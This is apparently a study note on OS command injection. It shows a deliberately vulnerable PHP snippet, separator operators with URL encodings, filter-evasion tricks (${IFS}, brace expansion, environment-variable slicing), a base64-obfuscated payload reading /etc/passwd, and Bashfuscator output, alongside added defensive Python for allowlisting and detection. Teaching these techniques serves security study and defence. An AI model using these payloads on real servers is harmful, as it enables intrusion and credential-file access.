Command Injections

Execute system commands on the back-end server

There are several types of injections found in web apps. The most common are:

Injection               Description
OS Command Injection    User input is used as part of an OS command.
Code Injection          User input is used within a function that evaluates code.
SQL Injection           User input is used as part of an SQL query.
XSS/HTML Injection      User input is displayed on a web page.

OS Command Injections

With OS command injections the user input must end up in a back-end call that executes a system command. Therefore look for functions in the programming language that execute system commands.

PHP

A web application written in PHP may use exec, system, shell_exec, passthru, or popen.

<?php
if (isset($_GET['filename'])) {
    system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>

Here touch is executed with the filename parameter concatenated straight into the command string, without any sanitation, which makes it vulnerable.
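The same handler in a safe form, as an added example that is not from the original page: the filename is checked against an allowlist and the command is started as an argv list so no shell ever parses the user input (in PHP the equivalent is the allowlist check plus escapeshellarg()). Function names and the /tmp directory are assumptions.

```python
import re
import subprocess
from pathlib import PurePosixPath
from typing import List

# Added example: the /tmp/<filename>.pdf handler above, rewritten so that
# user input is validated against an allowlist and never passed through a shell.
# SAFE_NAME, OUTPUT_DIR and the function names are assumptions.

SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")  # allowlist; everything else is rejected
OUTPUT_DIR = PurePosixPath("/tmp")


def validate_filename(name: str) -> bool:
    """True only for names built from letters, digits, '_' and '-'."""
    return SAFE_NAME.fullmatch(name) is not None


def build_touch_command(name: str) -> List[str]:
    """Return the argv for touch, or raise ValueError for a rejected name."""
    if not validate_filename(name):
        raise ValueError(f"rejected filename: {name!r}")
    # argv list: touch is executed directly, no shell interprets ';', '&&' or '|'
    return ["touch", str(OUTPUT_DIR / f"{name}.pdf")]


def vulnerable_command_string(name: str) -> str:
    """Equivalent of system("touch /tmp/" . $_GET['filename'] . ".pdf"); shown for contrast, never run here."""
    return "touch /tmp/" + name + ".pdf"


def create_placeholder(name: str) -> int:
    """Run the validated command without a shell and return its exit status."""
    return subprocess.run(build_touch_command(name), check=False).returncode


if __name__ == "__main__":
    for candidate in ("report", "x; id", "../x"):
        verdict = "accepted" if validate_filename(candidate) else "rejected"
        print(f"{candidate!r}: {verdict}; string form would be {vulnerable_command_string(candidate)!r}")
```

The allowlist is the important part: a blacklist of separator characters is exactly what the detection table below is designed to slip past, whereas rejecting everything outside a small character set has nothing to bypass.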

Detection

Finding out whether an input is vulnerable to command injection:

Operator      Character   URL-encoded   Executed command
Semicolon     ;           %3b           Both
New Line      \n          %0a           Both
Background    &           %26           Both (second output generally shown first)
Pipe          |           %7c           Both (only second output is shown)
AND           &&          %26%26        Both (only if first succeeds)
OR            ||          %7c%7c        Second (only if first fails)
Sub-Shell     ``          %60%60        Both (Linux-only)
Sub-Shell     $()         %24%28%29     Both (Linux-only)
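Detection logic for the operators in the table, as an added example that is not part of the original page: each parameter value is URL-decoded once, the way the back-end would decode it, and then checked for every separator listed. The request strings are constructed samples, and the operator names and function names are assumptions.

```python
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Added example: flag the table's operators in request parameters after
# URL-decoding them once. SAMPLE_PARAMS are constructed, not real traffic.

SAMPLE_PARAMS = [
    "ip=127.0.0.1",
    "ip=127.0.0.1%3bwhoami",
    "ip=127.0.0.1%26%26whoami",
    "ip=127.0.0.1%7c%7cid",
    "filename=report%0aid",
    "filename=report%24%28id%29",
    "filename=quarterly-report",
]

# Operator names from the table; the two-character forms are listed next to
# their one-character prefixes, so '&&' reports both "background" and "AND".
OPERATORS: Dict[str, str] = {
    "semicolon": ";",
    "newline": "\n",
    "background": "&",
    "AND": "&&",
    "pipe": "|",
    "OR": "||",
    "subshell-backtick": "`",
    "subshell-dollar": "$(",
}


def decode_param(raw: str) -> Tuple[str, str]:
    """Split 'name=value' and URL-decode the value (%3b -> ';', %0a -> newline, ...)."""
    name, _, value = raw.partition("=")
    return name, unquote(value)


def find_operators(value: str) -> List[str]:
    """Names of every table operator present in an already-decoded value."""
    return [name for name, token in OPERATORS.items() if token in value]


def scan(params: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(parameter, decoded value, operators found) for each suspicious parameter."""
    findings = []
    for raw in params:
        name, value = decode_param(raw)
        hits = find_operators(value)
        if hits:
            findings.append((name, value, hits))
    return findings


if __name__ == "__main__":
    for name, value, hits in scan(SAMPLE_PARAMS):
        print(f"{name}={value!r}: {', '.join(hits)}")
```

Two points matter when using something like this in a WAF rule or a log parser: decode exactly as many times as the application does (a check on the raw string misses %3b, and a check that decodes twice misses nothing but also flags harmless double-encoded values), and scan individual parameter values rather than the whole query string, where & is a legitimate parameter separator.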

Bypassing Front-End validation

It can happen that input is only validated on the front-end and not on the back-end. Front-end validation can then be bypassed, for example by URL-encoding the payload.

We can use && to chain commands:

ping -c 1 127.0.0.1 && whoami

Or use the OR (||) operator, which only executes the second command if the first command fails.

Other operators

Injection type                             Characters
SQL Injection                              ' , ; -- /* */
Command Injection                          ; &&
LDAP Injection                             * ( ) & |
XPath Injection                            ' or and not substring concat count
OS Command Injection                       ; & |
Code Injection                             ' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal    ../ ..\\ %00
Object Injection                           ; & |
XQuery Injection                           ' ; -- /* */
Shellcode Injection                        \x \u %u %n
Header Injection                           \r %0d %0a %09

Filter/WAF Detection

Web applications may use a WAF which has a list of blacklisted characters. Try various characters to see which are not blocked. If spaces are blacklisted, they can be bypassed in various ways:

  • Tabs = %09

  • IFS = ${IFS}

  • Brace expansions = {ls,-la}

Another option is to take the / character from an environment variable such as PATH:

echo ${PATH:0:1}
/

Or a semicolon:

echo ${LS_COLORS:10:1}
;

Or encode the command with base64:

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Bashfuscator can be used to obfuscate bash commands:

$ /bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters
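Why a character blacklist does not hold, as an added example that is not from the original page: the space-bypass forms listed above (tab, ${IFS}, brace expansion) are canonicalized back into a plain space before the filter rule runs, and inline base64 decoding is flagged as a pattern. The function names are assumptions; the base64 sample is the one shown above.

```python
import re
from urllib.parse import unquote

# Added example: canonicalize the space-bypass forms above before applying a
# blacklist check, to show what a raw-string filter misses. Names are assumptions.

BRACE_LIST = re.compile(r"\{([^{}\s,]+(?:,[^{}\s,]+)+)\}")   # matches {ls,-la}
IFS_FORMS = ("${IFS}", "$IFS")


def canonicalize(payload: str) -> str:
    """Rewrite tab, ${IFS} and brace-expansion tricks into a plain space."""
    s = unquote(payload)                  # %09 -> tab
    for form in IFS_FORMS:
        s = s.replace(form, " ")
    s = s.replace("\t", " ")
    # {ls,-la} expands to "ls -la" in bash, so rewrite it the same way
    s = BRACE_LIST.sub(lambda m: m.group(1).replace(",", " "), s)
    return s


def raw_space_filter_rejects(payload: str) -> bool:
    """A blacklist that looks for a literal space in the raw input."""
    return " " in payload


def canonical_space_filter_rejects(payload: str) -> bool:
    """The same rule applied after canonicalization."""
    return " " in canonicalize(payload)


def uses_base64_decode(payload: str) -> bool:
    """Flag inline decoding such as base64 -d <<< ... after canonicalization."""
    return re.search(r"base64\s+(-d|--decode)", canonicalize(payload)) is not None


if __name__ == "__main__":
    samples = (
        "ls%09-la",
        "ls${IFS}-la",
        "{ls,-la}",
        "bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)",
    )
    for p in samples:
        print(f"{p:60} raw:{raw_space_filter_rejects(p)!s:6} canonical:{canonical_space_filter_rejects(p)!s:6} "
              f"base64:{uses_base64_decode(p)}")
```

The caveat is the ${PATH:0:1} and ${LS_COLORS:10:1} tricks above: they expand at runtime on the target, so a static canonicalizer cannot know what character they produce, and every new expansion form needs a new rule. That is the practical reason to validate input against an allowlist and never hand it to a shell, rather than to keep extending a blacklist.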
